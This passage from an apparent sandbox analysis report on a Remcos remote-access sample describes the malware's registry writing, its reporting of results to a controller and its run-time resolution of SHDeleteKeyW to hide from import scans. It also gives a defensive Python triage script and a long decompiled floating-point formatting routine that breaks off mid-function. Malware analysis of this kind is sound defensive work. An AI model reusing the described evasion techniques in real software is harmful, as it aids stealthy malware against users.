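                                    Two details of the decompiled routine above are worth checking mechanically rather than by eye. First, the RegCreateKeyExW call passes samDesired = 0x20006, which is the composite KEY_WRITE (STANDARD_RIGHTS_WRITE | KEY_SET_VALUE | KEY_CREATE_SUB_KEY); the return value then selects the reply string "7" (failure) or "6" (success) that is handed to L00404AA4, whose subcall the APIs list identifies as send.WS2_32, i.e. the result appears to be acknowledged to the controller. Second, the APIs and String ID entries show Shlwapi.dll / SHDeleteKeyW being resolved at run time through LoadLibraryA and GetProcAddress, so the registry-key-deletion capability does not show up in the static import table. The script below is an added triage example written for this page; it is not part of the Joe Sandbox output and not the sample's code. It decodes the access mask and scans a dump-like byte buffer for the indicator strings in both ASCII and UTF-16LE. The SAMPLE_DUMP bytes are constructed for the example and are not taken from the analysed memory dump.

```python
"""Triage helpers for the registry routine in the report (added example;
not Joe Sandbox output and not Remcos code).

  1. decode the samDesired mask passed to RegCreateKeyExW (0x20006 in the
     listing) into the named registry rights it is built from;
  2. locate the "Shlwapi.dll" / "SHDeleteKeyW" string pair that a
     GetProcAddress(LoadLibraryA("Shlwapi.dll"), "SHDeleteKeyW") sequence
     needs, in both ASCII and UTF-16LE encodings.

SAMPLE_DUMP is a constructed stand-in for a slice of an unpacked image.
"""

import re
from typing import Optional

# Individual registry access rights (values from winnt.h / winreg.h).
# STANDARD_RIGHTS_WRITE is defined as READ_CONTROL (0x20000), so the
# 0x20000 bit of KEY_WRITE decodes to that name.
REG_RIGHTS = {
    0x0001: "KEY_QUERY_VALUE",
    0x0002: "KEY_SET_VALUE",
    0x0004: "KEY_CREATE_SUB_KEY",
    0x0008: "KEY_ENUMERATE_SUB_KEYS",
    0x0010: "KEY_NOTIFY",
    0x0020: "KEY_CREATE_LINK",
    0x0100: "KEY_WOW64_64KEY",
    0x0200: "KEY_WOW64_32KEY",
    0x00010000: "DELETE",
    0x00020000: "READ_CONTROL",
    0x00040000: "WRITE_DAC",
    0x00080000: "WRITE_OWNER",
}

# Composite masks as defined in winreg.h.
KEY_WRITE = 0x20006       # STANDARD_RIGHTS_WRITE | KEY_SET_VALUE | KEY_CREATE_SUB_KEY
KEY_READ = 0x20019
KEY_ALL_ACCESS = 0xF003F
COMPOSITES = {KEY_WRITE: "KEY_WRITE", KEY_READ: "KEY_READ", KEY_ALL_ACCESS: "KEY_ALL_ACCESS"}


def decode_sam(sam: int) -> list:
    """Return the names of the individual rights set in a samDesired mask."""
    names = [name for bit, name in REG_RIGHTS.items() if sam & bit]
    leftover = sam & ~sum(REG_RIGHTS)      # bits not covered by the table
    if leftover:
        names.append("UNKNOWN_0x%X" % leftover)
    return names


def composite_name(sam: int) -> Optional[str]:
    """Name of the winreg.h composite mask, if the value is exactly one."""
    return COMPOSITES.get(sam)


# Strings from the report's APIs / String ID entries for this function.
INDICATORS = ("Shlwapi.dll", "SHDeleteKeyW", "LoadLibraryA", "GetProcAddress")


def find_indicators(dump: bytes) -> dict:
    """Map each indicator found to its (encoding, offset) occurrences.

    Both encodings are searched because the routine mixes W-suffixed
    registry APIs with an ANSI module name passed to LoadLibraryA."""
    hits = {}
    for s in INDICATORS:
        for enc, needle in (("ascii", s.encode("ascii")),
                            ("utf-16le", s.encode("utf-16le"))):
            for m in re.finditer(re.escape(needle), dump):
                hits.setdefault(s, []).append((enc, m.start()))
    return hits


def dynamic_shdeletekey_resolution(dump: bytes) -> bool:
    """True when both the module name and the export name are present,
    which is what run-time resolution of SHDeleteKeyW requires."""
    hits = find_indicators(dump)
    return "Shlwapi.dll" in hits and "SHDeleteKeyW" in hits


def triage(sam: int, dump: bytes) -> dict:
    """Combine both checks into one result dictionary."""
    return {
        "sam": hex(sam),
        "sam_rights": decode_sam(sam),
        "sam_composite": composite_name(sam),
        "dynamic_SHDeleteKeyW": dynamic_shdeletekey_resolution(dump),
        "indicators": find_indicators(dump),
    }


# Constructed sample: 16 bytes of padding, the two NUL-terminated ASCII
# strings, then the module name again as UTF-16LE.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"Shlwapi.dll\x00"
    + b"SHDeleteKeyW\x00"
    + "Shlwapi.dll".encode("utf-16le")
    + b"\x00" * 8
)

if __name__ == "__main__":
    import json
    print(json.dumps(triage(0x20006, SAMPLE_DUMP), indent=2))
```

                                    Run against a real dump (for instance the 0000000C.00000002.518343742.0000000000400000 region listed under Memory Dump Source) by reading the file into `dump`; the mask decoder is independent of the dump and can be applied to any samDesired value lifted from a RegOpenKeyExW or RegCreateKeyExW call in the listing.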

                                    C-Code - Quality: 77%
                                    			E0044D3FA(void* __ebx, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
                                    				signed int _v0;
                                    				signed int _v8;
                                    				char _v460;
                                    				signed int _v464;
                                    				void _v468;
                                    				signed int _v472;
                                    				signed int _v932;
                                    				signed int _v936;
                                    				signed int _v1392;
                                    				signed int _v1396;
                                    				signed int _v1400;
                                    				char _v1860;
                                    				signed int _v1864;
                                    				signed int _v1865;
                                    				signed int _v1872;
                                    				signed int _v1876;
                                    				signed int _v1880;
                                    				signed int _v1884;
                                    				signed int _v1888;
                                    				signed int _v1892;
                                    				signed int _v1896;
                                    				intOrPtr _v1900;
                                    				signed int _v1904;
                                    				signed int _v1908;
                                    				signed int _v1912;
                                    				signed int _v1916;
                                    				signed int _v1920;
                                    				signed int _v1924;
                                    				signed int _v1928;
                                    				char _v1936;
                                    				char _v1944;
                                    				char _v2404;
                                    				signed int _v2408;
                                    				signed int _v2424;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t725;
                                    				signed int _t735;
                                    				signed int _t736;
                                    				signed int _t740;
                                    				intOrPtr _t742;
                                    				intOrPtr* _t743;
                                    				intOrPtr* _t746;
                                    				signed int _t751;
                                    				signed int _t752;
                                    				signed int _t758;
                                    				signed int _t764;
                                    				intOrPtr _t766;
                                    				void* _t767;
                                    				signed int _t768;
                                    				signed int _t769;
                                    				signed int _t770;
                                    				signed int _t778;
                                    				signed int _t779;
                                    				signed int _t782;
                                    				signed int _t783;
                                    				signed int _t784;
                                    				signed int _t787;
                                    				signed int _t788;
                                    				signed int _t789;
                                    				signed int _t791;
                                    				signed int _t792;
                                    				signed int _t793;
                                    				signed int _t794;
                                    				signed int _t799;
                                    				signed int _t800;
                                    				signed int _t805;
                                    				signed int _t806;
                                    				signed int _t809;
                                    				signed int _t813;
                                    				signed int _t820;
                                    				signed int* _t823;
                                    				signed int _t826;
                                    				signed int _t837;
                                    				signed int _t838;
                                    				signed int _t840;
                                    				char* _t841;
                                    				signed int _t843;
                                    				signed int _t847;
                                    				signed int _t848;
                                    				signed int _t852;
                                    				signed int _t854;
                                    				signed int _t859;
                                    				signed int _t867;
                                    				signed int _t870;
                                    				signed int _t872;
                                    				signed int _t875;
                                    				signed int _t876;
                                    				signed int _t877;
                                    				signed int _t880;
                                    				signed int _t893;
                                    				signed int _t894;
                                    				signed int _t896;
                                    				char* _t897;
                                    				signed int _t899;
                                    				signed int _t903;
                                    				signed int _t904;
                                    				signed int* _t906;
                                    				signed int _t908;
                                    				signed int _t910;
                                    				signed int _t915;
                                    				signed int _t922;
                                    				signed int _t925;
                                    				signed int _t929;
                                    				signed int* _t936;
                                    				intOrPtr _t938;
                                    				void* _t939;
                                    				intOrPtr* _t941;
                                    				signed int* _t945;
                                    				unsigned int _t956;
                                    				signed int _t957;
                                    				void* _t960;
                                    				signed int _t961;
                                    				void* _t963;
                                    				signed int _t964;
                                    				signed int _t965;
                                    				signed int _t966;
                                    				signed int _t974;
                                    				signed int _t979;
                                    				signed int _t982;
                                    				unsigned int _t985;
                                    				signed int _t986;
                                    				void* _t989;
                                    				signed int _t990;
                                    				void* _t992;
                                    				signed int _t993;
                                    				signed int _t994;
                                    				signed int _t995;
                                    				signed int _t999;
                                    				signed int* _t1004;
                                    				signed int _t1006;
                                    				signed int _t1016;
                                    				void _t1019;
                                    				signed int _t1022;
                                    				void* _t1025;
                                    				signed int _t1036;
                                    				signed int _t1037;
                                    				signed int _t1040;
                                    				signed int _t1041;
                                    				signed int _t1043;
                                    				signed int _t1044;
                                    				signed int _t1045;
                                    				signed int _t1049;
                                    				signed int _t1053;
                                    				signed int _t1054;
                                    				signed int _t1055;
                                    				signed int _t1057;
                                    				signed int _t1058;
                                    				signed int _t1059;
                                    				signed int _t1060;
                                    				signed int _t1061;
                                    				signed int _t1062;
                                    				signed int _t1064;
                                    				signed int _t1065;
                                    				signed int _t1066;
                                    				signed int _t1067;
                                    				signed int _t1068;
                                    				signed int _t1069;
                                    				unsigned int _t1070;
                                    				void* _t1073;
                                    				intOrPtr _t1075;
                                    				signed int _t1076;
                                    				signed int _t1077;
                                    				signed int _t1078;
                                    				signed int* _t1082;
                                    				void* _t1086;
                                    				void* _t1087;
                                    				signed int _t1088;
                                    				signed int _t1089;
                                    				signed int _t1090;
                                    				signed int _t1093;
                                    				signed int _t1094;
                                    				signed int _t1099;
                                    				signed int _t1101;
                                    				signed int _t1104;
                                    				char _t1109;
                                    				signed int _t1111;
                                    				signed int _t1112;
                                    				signed int _t1113;
                                    				signed int _t1114;
                                    				signed int _t1115;
                                    				signed int _t1116;
                                    				signed int _t1117;
                                    				signed int _t1121;
                                    				signed int _t1122;
                                    				signed int _t1123;
                                    				signed int _t1124;
                                    				signed int _t1125;
                                    				unsigned int _t1128;
                                    				void* _t1132;
                                    				void* _t1133;
                                    				unsigned int _t1134;
                                    				signed int _t1139;
                                    				signed int _t1140;
                                    				signed int _t1142;
                                    				signed int _t1143;
                                    				intOrPtr* _t1145;
                                    				signed int _t1146;
                                    				signed int _t1147;
                                    				signed int _t1150;
                                    				signed int _t1151;
                                    				signed int _t1154;
                                    				signed int _t1156;
                                    				signed int _t1157;
                                    				void* _t1158;
                                    				signed int _t1159;
                                    				signed int _t1160;
                                    				signed int _t1161;
                                    				void* _t1164;
                                    				signed int _t1165;
                                    				signed int _t1166;
                                    				signed int _t1167;
                                    				signed int _t1168;
                                    				signed int _t1169;
                                    				signed int* _t1172;
                                    				signed int _t1173;
                                    				signed int _t1174;
                                    				signed int _t1175;
                                    				signed int _t1176;
                                    				intOrPtr* _t1178;
                                    				intOrPtr* _t1179;
                                    				signed int _t1181;
                                    				signed int _t1183;
                                    				signed int _t1186;
                                    				signed int _t1192;
                                    				signed int _t1196;
                                    				signed int _t1197;
                                    				intOrPtr _t1199;
                                    				intOrPtr _t1200;
                                    				signed int _t1205;
                                    				signed int _t1208;
                                    				signed int _t1209;
                                    				signed int _t1210;
                                    				signed int _t1211;
                                    				signed int _t1212;
                                    				signed int _t1213;
                                    				signed int _t1215;
                                    				signed int _t1216;
                                    				signed int _t1217;
                                    				signed int _t1218;
                                    				signed int _t1220;
                                    				signed int _t1221;
                                    				signed int _t1222;
                                    				signed int _t1223;
                                    				signed int _t1224;
                                    				signed int _t1226;
                                    				signed int _t1227;
                                    				signed int _t1229;
                                    				signed int _t1231;
                                    				signed int _t1233;
                                    				signed int _t1235;
                                    				signed int* _t1237;
                                    				signed int* _t1241;
                                    				signed int _t1250;
                                    
                                    				_t725 =  *0x46a00c; // 0xbd45ae92
                                    				_v8 = _t725 ^ _t1235;
                                    				_t1016 = _a20;
                                    				_t1145 = _a16;
                                    				_v1924 = _t1145;
                                    				_v1920 = _t1016;
                                    				E0044D3D0( &_v1944, __eflags);
                                    				_t1196 = _a8;
                                    				_t730 = 0x2d;
                                    				if((_t1196 & 0x80000000) == 0) {
                                    					_t730 = 0x120;
                                    				}
                                    				 *_t1145 = _t730;
                                    				 *((intOrPtr*)(_t1145 + 8)) = _t1016;
                                    				_t1146 = _a4;
                                    				if((_t1196 & 0x7ff00000) != 0) {
                                    					L5:
                                    					_t735 = L00443788( &_a4);
                                    					_pop(_t1031);
                                    					__eflags = _t735;
                                    					if(_t735 != 0) {
                                    						_t1031 = _v1924;
                                    						 *((intOrPtr*)(_v1924 + 4)) = 1;
                                    					}
                                    					_t736 = _t735 - 1;
                                    					__eflags = _t736;
                                    					if(_t736 == 0) {
                                    						_push("1#INF");
                                    						goto L308;
                                    					} else {
                                    						_t751 = _t736 - 1;
                                    						__eflags = _t751;
                                    						if(_t751 == 0) {
                                    							_push("1#QNAN");
                                    							goto L308;
                                    						} else {
                                    							_t752 = _t751 - 1;
                                    							__eflags = _t752;
                                    							if(_t752 == 0) {
                                    								_push("1#SNAN");
                                    								goto L308;
                                    							} else {
                                    								__eflags = _t752 == 1;
                                    								if(_t752 == 1) {
                                    									_push("1#IND");
                                    									goto L308;
                                    								} else {
                                    									_v1928 = _v1928 & 0x00000000;
                                    									_a4 = _t1146;
                                    									_a8 = _t1196 & 0x7fffffff;
                                    									_t1250 = _a4;
                                    									asm("fst qword [ebp-0x768]");
                                    									_t1150 = _v1896;
                                    									_v1916 = _a12 + 1;
                                    									_t1036 = _t1150 >> 0x14;
                                    									_t758 = _t1036 & 0x000007ff;
                                    									__eflags = _t758;
                                    									if(_t758 != 0) {
                                    										_t1101 = 0;
                                    										_t758 = 0;
                                    										__eflags = 0;
                                    									} else {
                                    										_t1101 = 1;
                                    									}
                                    									_t1151 = _t1150 & 0x000fffff;
                                    									_t1019 = _v1900 + _t758;
                                    									asm("adc edi, esi");
                                    									__eflags = _t1101;
                                    									_t1037 = _t1036 & 0x000007ff;
                                    									_t1205 = _t1037 - 0x434 + (0 | _t1101 != 0x00000000) + 1;
                                    									_v1872 = _t1205;
                                    									L0044FF70(_t1037, _t1250);
                                    									_push(_t1037);
                                    									_push(_t1037);
                                    									 *_t1237 = _t1250;
                                    									_t764 = L00450E00(E00450080(_t1151, _t1205), _t1250);
                                    									_v1904 = _t764;
                                    									__eflags = _t764 - 0x7fffffff;
                                    									if(_t764 == 0x7fffffff) {
                                    										L16:
                                    										__eflags = 0;
                                    										_v1904 = 0;
                                    									} else {
                                    										__eflags = _t764 - 0x80000000;
                                    										if(_t764 == 0x80000000) {
                                    											goto L16;
                                    										}
                                    									}
                                    									_v468 = _t1019;
                                    									__eflags = _t1151;
                                    									_v464 = _t1151;
                                    									_t1022 = (0 | _t1151 != 0x00000000) + 1;
                                    									_v472 = _t1022;
                                    									__eflags = _t1205;
                                    									if(_t1205 < 0) {
                                    										__eflags = _t1205 - 0xfffffc02;
                                    										if(_t1205 == 0xfffffc02) {
                                    											L101:
                                    											_t766 =  *((intOrPtr*)(_t1235 + _t1022 * 4 - 0x1d4));
                                    											_t195 =  &_v1896;
                                    											 *_t195 = _v1896 & 0x00000000;
                                    											__eflags =  *_t195;
                                    											asm("bsr eax, eax");
                                    											if( *_t195 == 0) {
                                    												_t1040 = 0;
                                    												__eflags = 0;
                                    											} else {
                                    												_t1040 = _t766 + 1;
                                    											}
                                    											_t767 = 0x20;
                                    											_t768 = _t767 - _t1040;
                                    											__eflags = _t768 - 1;
                                    											_t769 = _t768 & 0xffffff00 | _t768 - 0x00000001 > 0x00000000;
                                    											__eflags = _t1022 - 0x73;
                                    											_v1865 = _t769;
                                    											_t1041 = _t1040 & 0xffffff00 | _t1022 - 0x00000073 > 0x00000000;
                                    											__eflags = _t1022 - 0x73;
                                    											if(_t1022 != 0x73) {
                                    												L107:
                                    												_t770 = 0;
                                    												__eflags = 0;
                                    											} else {
                                    												__eflags = _t769;
                                    												if(_t769 == 0) {
                                    													goto L107;
                                    												} else {
                                    													_t770 = 1;
                                    												}
                                    											}
                                    											__eflags = _t1041;
                                    											if(_t1041 != 0) {
                                    												L126:
                                    												_v1400 = _v1400 & 0x00000000;
                                    												_t224 =  &_v472;
                                    												 *_t224 = _v472 & 0x00000000;
                                    												__eflags =  *_t224;
                                    												_push(0);
                                    												_push( &_v1396);
                                    												_push(0x1cc);
                                    												_push( &_v468);
                                    												L313();
                                    												_t1237 =  &(_t1237[4]);
                                    											} else {
                                    												__eflags = _t770;
                                    												if(_t770 != 0) {
                                    													goto L126;
                                    												} else {
                                    													_t1068 = 0x72;
                                    													__eflags = _t1022 - _t1068;
                                    													if(_t1022 < _t1068) {
                                    														_t1068 = _t1022;
                                    													}
                                    													__eflags = _t1068 - 0xffffffff;
                                    													if(_t1068 != 0xffffffff) {
                                    														_t1223 = _t1068;
                                    														_t1178 =  &_v468 + _t1068 * 4;
                                    														_v1880 = _t1178;
                                    														while(1) {
                                    															__eflags = _t1223 - _t1022;
                                    															if(_t1223 >= _t1022) {
                                    																_t208 =  &_v1876;
                                    																 *_t208 = _v1876 & 0x00000000;
                                    																__eflags =  *_t208;
                                    															} else {
                                    																_v1876 =  *_t1178;
                                    															}
                                    															_t210 = _t1223 - 1; // 0x70
                                    															__eflags = _t210 - _t1022;
                                    															if(_t210 >= _t1022) {
                                    																_t1128 = 0;
                                    																__eflags = 0;
                                    															} else {
                                    																_t1128 =  *(_t1178 - 4);
                                    															}
                                    															_t1178 = _t1178 - 4;
                                    															_t936 = _v1880;
                                    															_t1223 = _t1223 - 1;
                                    															 *_t936 = _t1128 >> 0x0000001f ^ _v1876 + _v1876;
                                    															_v1880 = _t936 - 4;
                                    															__eflags = _t1223 - 0xffffffff;
                                    															if(_t1223 == 0xffffffff) {
                                    																break;
                                    															}
                                    															_t1022 = _v472;
                                    														}
                                    														_t1205 = _v1872;
                                    													}
                                    													__eflags = _v1865;
                                    													if(_v1865 == 0) {
                                    														_v472 = _t1068;
                                    													} else {
                                    														_t218 = _t1068 + 1; // 0x73
                                    														_v472 = _t218;
                                    													}
                                    												}
                                    											}
                                    											_t1154 = 1 - _t1205;
                                    											L00431F00(_t1154,  &_v1396, 0, 1);
                                    											__eflags = 1;
                                    											 *(_t1235 + 0xbad63d) = 1 << (_t1154 & 0x0000001f);
                                    											_t778 = 0xbadbae;
                                    										} else {
                                    											_v1396 = _v1396 & 0x00000000;
                                    											_t1069 = 2;
                                    											_v1392 = 0x100000;
                                    											_v1400 = _t1069;
                                    											__eflags = _t1022 - _t1069;
                                    											if(_t1022 == _t1069) {
                                    												_t1132 = 0;
                                    												__eflags = 0;
                                    												while(1) {
                                    													_t938 =  *((intOrPtr*)(_t1235 + _t1132 - 0x570));
                                    													__eflags = _t938 -  *((intOrPtr*)(_t1235 + _t1132 - 0x1d0));
                                    													if(_t938 !=  *((intOrPtr*)(_t1235 + _t1132 - 0x1d0))) {
                                    														goto L101;
                                    													}
                                    													_t1132 = _t1132 + 4;
                                    													__eflags = _t1132 - 8;
                                    													if(_t1132 != 8) {
                                    														continue;
                                    													} else {
                                    														_t166 =  &_v1896;
                                    														 *_t166 = _v1896 & 0x00000000;
                                    														__eflags =  *_t166;
                                    														asm("bsr eax, edi");
                                    														if( *_t166 == 0) {
                                    															_t1133 = 0;
                                    															__eflags = 0;
                                    														} else {
                                    															_t1133 = _t938 + 1;
                                    														}
                                    														_t939 = 0x20;
                                    														_t1224 = _t1069;
                                    														__eflags = _t939 - _t1133 - _t1069;
                                    														_t941 =  &_v460;
                                    														_v1880 = _t941;
                                    														_t1179 = _t941;
                                    														_t171 =  &_v1865;
                                    														 *_t171 = _t939 - _t1133 - _t1069 > 0;
                                    														__eflags =  *_t171;
                                    														while(1) {
                                    															__eflags = _t1224 - _t1022;
                                    															if(_t1224 >= _t1022) {
                                    																_t173 =  &_v1876;
                                    																 *_t173 = _v1876 & 0x00000000;
                                    																__eflags =  *_t173;
                                    															} else {
                                    																_v1876 =  *_t1179;
                                    															}
                                    															_t175 = _t1224 - 1; // 0x0
                                    															__eflags = _t175 - _t1022;
                                    															if(_t175 >= _t1022) {
                                    																_t1134 = 0;
                                    																__eflags = 0;
                                    															} else {
                                    																_t1134 =  *(_t1179 - 4);
                                    															}
                                    															_t1179 = _t1179 - 4;
                                    															_t945 = _v1880;
                                    															_t1224 = _t1224 - 1;
                                    															 *_t945 = _t1134 >> 0x0000001e ^ _v1876 << 0x00000002;
                                    															_v1880 = _t945 - 4;
                                    															__eflags = _t1224 - 0xffffffff;
                                    															if(_t1224 == 0xffffffff) {
                                    																break;
                                    															}
                                    															_t1022 = _v472;
                                    														}
                                    														__eflags = _v1865;
                                    														_t1070 = _t1069 - _v1872;
                                    														_v472 = (0 | _v1865 != 0x00000000) + _t1069;
                                    														_t1181 = _t1070 >> 5;
                                    														_v1884 = _t1070;
                                    														_t1226 = _t1181 << 2;
                                    														L00431F00(_t1181,  &_v1396, 0, _t1226);
                                    														 *(_t1235 + _t1226 - 0x570) = 1 << (_v1884 & 0x0000001f);
                                    														_t778 = _t1181 + 1;
                                    													}
                                    													goto L128;
                                    												}
                                    											}
                                    											goto L101;
                                    										}
                                    										L128:
                                    										_v1400 = _t778;
                                    										_t1025 = 0x1cc;
                                    										_v936 = _t778;
                                    										_t779 = _t778 << 2;
                                    										__eflags = _t779;
                                    										_push(_t779);
                                    										_push( &_v1396);
                                    										_push(0x1cc);
                                    										_push( &_v932);
                                    										L313();
                                    										_t1241 =  &(_t1237[7]);
                                    									} else {
                                    										_v1396 = _v1396 & 0x00000000;
                                    										_t1227 = 2;
                                    										_v1392 = 0x100000;
                                    										_v1400 = _t1227;
                                    										__eflags = _t1022 - _t1227;
                                    										if(_t1022 != _t1227) {
                                    											L53:
                                    											_t956 = _v1872 + 1;
                                    											_t957 = _t956 & 0x0000001f;
                                    											_t1073 = 0x20;
                                    											_v1876 = _t957;
                                    											_t1183 = _t956 >> 5;
                                    											_v1872 = _t1183;
                                    											_v1908 = _t1073 - _t957;
                                    											_t960 = L00450DC0(1, _t1073 - _t957, 0);
                                    											_t1075 =  *((intOrPtr*)(_t1235 + _t1022 * 4 - 0x1d4));
                                    											_t961 = _t960 - 1;
                                    											_t108 =  &_v1896;
                                    											 *_t108 = _v1896 & 0x00000000;
                                    											__eflags =  *_t108;
                                    											asm("bsr ecx, ecx");
                                    											_v1884 = _t961;
                                    											_v1912 =  !_t961;
                                    											if( *_t108 == 0) {
                                    												_t1076 = 0;
                                    												__eflags = 0;
                                    											} else {
                                    												_t1076 = _t1075 + 1;
                                    											}
                                    											_t963 = 0x20;
                                    											_t964 = _t963 - _t1076;
                                    											_t1139 = _t1022 + _t1183;
                                    											__eflags = _v1876 - _t964;
                                    											_v1892 = _t1139;
                                    											_t965 = _t964 & 0xffffff00 | _v1876 - _t964 > 0x00000000;
                                    											__eflags = _t1139 - 0x73;
                                    											_v1865 = _t965;
                                    											_t1077 = _t1076 & 0xffffff00 | _t1139 - 0x00000073 > 0x00000000;
                                    											__eflags = _t1139 - 0x73;
                                    											if(_t1139 != 0x73) {
                                    												L59:
                                    												_t966 = 0;
                                    												__eflags = 0;
                                    											} else {
                                    												__eflags = _t965;
                                    												if(_t965 == 0) {
                                    													goto L59;
                                    												} else {
                                    													_t966 = 1;
                                    												}
                                    											}
                                    											__eflags = _t1077;
                                    											if(_t1077 != 0) {
                                    												L81:
                                    												__eflags = 0;
                                    												_t1025 = 0x1cc;
                                    												_push(0);
                                    												_v1400 = 0;
                                    												_v472 = 0;
                                    												_push( &_v1396);
                                    												_push(0x1cc);
                                    												_push( &_v468);
                                    												L313();
                                    												_t1237 =  &(_t1237[4]);
                                    											} else {
                                    												__eflags = _t966;
                                    												if(_t966 != 0) {
                                    													goto L81;
                                    												} else {
                                    													_t1078 = 0x72;
                                    													__eflags = _t1139 - _t1078;
                                    													if(_t1139 >= _t1078) {
                                    														_t1139 = _t1078;
                                    														_v1892 = _t1078;
                                    													}
                                    													_t974 = _t1139;
                                    													_v1880 = _t974;
                                    													__eflags = _t1139 - 0xffffffff;
                                    													if(_t1139 != 0xffffffff) {
                                    														_t1140 = _v1872;
                                    														_t1229 = _t1139 - _t1140;
                                    														__eflags = _t1229;
                                    														_t1082 =  &_v468 + _t1229 * 4;
                                    														_v1888 = _t1082;
                                    														while(1) {
                                    															__eflags = _t974 - _t1140;
                                    															if(_t974 < _t1140) {
                                    																break;
                                    															}
                                    															__eflags = _t1229 - _t1022;
                                    															if(_t1229 >= _t1022) {
                                    																_t1186 = 0;
                                    																__eflags = 0;
                                    															} else {
                                    																_t1186 =  *_t1082;
                                    															}
                                    															__eflags = _t1229 - 1 - _t1022;
                                    															if(_t1229 - 1 >= _t1022) {
                                    																_t979 = 0;
                                    																__eflags = 0;
                                    															} else {
                                    																_t979 =  *(_t1082 - 4);
                                    															}
                                    															_t982 = _v1880;
                                    															_t1082 = _v1888 - 4;
                                    															_v1888 = _t1082;
                                    															 *(_t1235 + _t982 * 4 - 0x1d0) = (_t1186 & _v1884) << _v1876 | (_t979 & _v1912) >> _v1908;
                                    															_t974 = _t982 - 1;
                                    															_t1229 = _t1229 - 1;
                                    															_v1880 = _t974;
                                    															__eflags = _t974 - 0xffffffff;
                                    															if(_t974 != 0xffffffff) {
                                    																_t1022 = _v472;
                                    																continue;
                                    															}
                                    															break;
                                    														}
                                    														_t1139 = _v1892;
                                    														_t1183 = _v1872;
                                    														_t1227 = 2;
                                    													}
                                    													__eflags = _t1183;
                                    													if(_t1183 != 0) {
                                    														__eflags = 0;
                                    														memset( &_v468, 0, _t1183 << 2);
                                    														_t1237 =  &(_t1237[3]);
                                    													}
                                    													__eflags = _v1865;
                                    													_t1025 = 0x1cc;
                                    													if(_v1865 == 0) {
                                    														_v472 = _t1139;
                                    													} else {
                                    														_v472 = _t1139 + 1;
                                    													}
                                    												}
                                    											}
                                    											_v1392 = _v1392 & 0x00000000;
                                    											_v1396 = _t1227;
                                    											_v1400 = 1;
                                    											_v936 = 1;
                                    											_push(4);
                                    										} else {
                                    											_t1086 = 0;
                                    											__eflags = 0;
                                    											while(1) {
                                    												__eflags =  *((intOrPtr*)(_t1235 + _t1086 - 0x570)) -  *((intOrPtr*)(_t1235 + _t1086 - 0x1d0));
                                    												if( *((intOrPtr*)(_t1235 + _t1086 - 0x570)) !=  *((intOrPtr*)(_t1235 + _t1086 - 0x1d0))) {
                                    													goto L53;
                                    												}
                                    												_t1086 = _t1086 + 4;
                                    												__eflags = _t1086 - 8;
                                    												if(_t1086 != 8) {
                                    													continue;
                                    												} else {
                                    													_t985 = _v1872 + 2;
                                    													_t986 = _t985 & 0x0000001f;
                                    													_t1087 = 0x20;
                                    													_t1088 = _t1087 - _t986;
                                    													_v1888 = _t986;
                                    													_t1231 = _t985 >> 5;
                                    													_v1876 = _t1231;
                                    													_v1908 = _t1088;
                                    													_t989 = L00450DC0(1, _t1088, 0);
                                    													_v1896 = _v1896 & 0x00000000;
                                    													_t990 = _t989 - 1;
                                    													__eflags = _t990;
                                    													asm("bsr ecx, edi");
                                    													_v1884 = _t990;
                                    													_v1912 =  !_t990;
                                    													if(_t990 == 0) {
                                    														_t1089 = 0;
                                    														__eflags = 0;
                                    													} else {
                                    														_t1089 = _t1088 + 1;
                                    													}
                                    													_t992 = 0x20;
                                    													_t993 = _t992 - _t1089;
                                    													_t1142 = _t1231 + 2;
                                    													__eflags = _v1888 - _t993;
                                    													_v1880 = _t1142;
                                    													_t994 = _t993 & 0xffffff00 | _v1888 - _t993 > 0x00000000;
                                    													__eflags = _t1142 - 0x73;
                                    													_v1865 = _t994;
                                    													_t1090 = _t1089 & 0xffffff00 | _t1142 - 0x00000073 > 0x00000000;
                                    													__eflags = _t1142 - 0x73;
                                    													if(_t1142 != 0x73) {
                                    														L28:
                                    														_t995 = 0;
                                    														__eflags = 0;
                                    													} else {
                                    														__eflags = _t994;
                                    														if(_t994 == 0) {
                                    															goto L28;
                                    														} else {
                                    															_t995 = 1;
                                    														}
                                    													}
                                    													__eflags = _t1090;
                                    													if(_t1090 != 0) {
                                    														L50:
                                    														__eflags = 0;
                                    														_t1025 = 0x1cc;
                                    														_push(0);
                                    														_v1400 = 0;
                                    														_v472 = 0;
                                    														_push( &_v1396);
                                    														_push(0x1cc);
                                    														_push( &_v468);
                                    														L313();
                                    														_t1237 =  &(_t1237[4]);
                                    													} else {
                                    														__eflags = _t995;
                                    														if(_t995 != 0) {
                                    															goto L50;
                                    														} else {
                                    															_t1093 = 0x72;
                                    															__eflags = _t1142 - _t1093;
                                    															if(_t1142 >= _t1093) {
                                    																_t1142 = _t1093;
                                    																_v1880 = _t1093;
                                    															}
                                    															_t1094 = _t1142;
                                    															_v1892 = _t1094;
                                    															__eflags = _t1142 - 0xffffffff;
                                    															if(_t1142 != 0xffffffff) {
                                    																_t1143 = _v1876;
                                    																_t1233 = _t1142 - _t1143;
                                    																__eflags = _t1233;
                                    																_t1004 =  &_v468 + _t1233 * 4;
                                    																_v1872 = _t1004;
                                    																while(1) {
                                    																	__eflags = _t1094 - _t1143;
                                    																	if(_t1094 < _t1143) {
                                    																		break;
                                    																	}
                                    																	__eflags = _t1233 - _t1022;
                                    																	if(_t1233 >= _t1022) {
                                    																		_t1192 = 0;
                                    																		__eflags = 0;
                                    																	} else {
                                    																		_t1192 =  *_t1004;
                                    																	}
                                    																	__eflags = _t1233 - 1 - _t1022;
                                    																	if(_t1233 - 1 >= _t1022) {
                                    																		_t1006 = 0;
                                    																		__eflags = 0;
                                    																	} else {
                                    																		_t1006 =  *(_v1872 - 4);
                                    																	}
                                    																	_t1099 = _v1892;
                                    																	 *(_t1235 + _t1099 * 4 - 0x1d0) = (_t1006 & _v1912) >> _v1908 | (_t1192 & _v1884) << _v1888;
                                    																	_t1094 = _t1099 - 1;
                                    																	_t1233 = _t1233 - 1;
                                    																	_t1004 = _v1872 - 4;
                                    																	_v1892 = _t1094;
                                    																	_v1872 = _t1004;
                                    																	__eflags = _t1094 - 0xffffffff;
                                    																	if(_t1094 != 0xffffffff) {
                                    																		_t1022 = _v472;
                                    																		continue;
                                    																	}
                                    																	break;
                                    																}
                                    																_t1142 = _v1880;
                                    																_t1231 = _v1876;
                                    															}
                                    															__eflags = _t1231;
                                    															if(_t1231 != 0) {
                                    																__eflags = 0;
                                    																memset( &_v468, 0, _t1231 << 2);
                                    																_t1237 =  &(_t1237[3]);
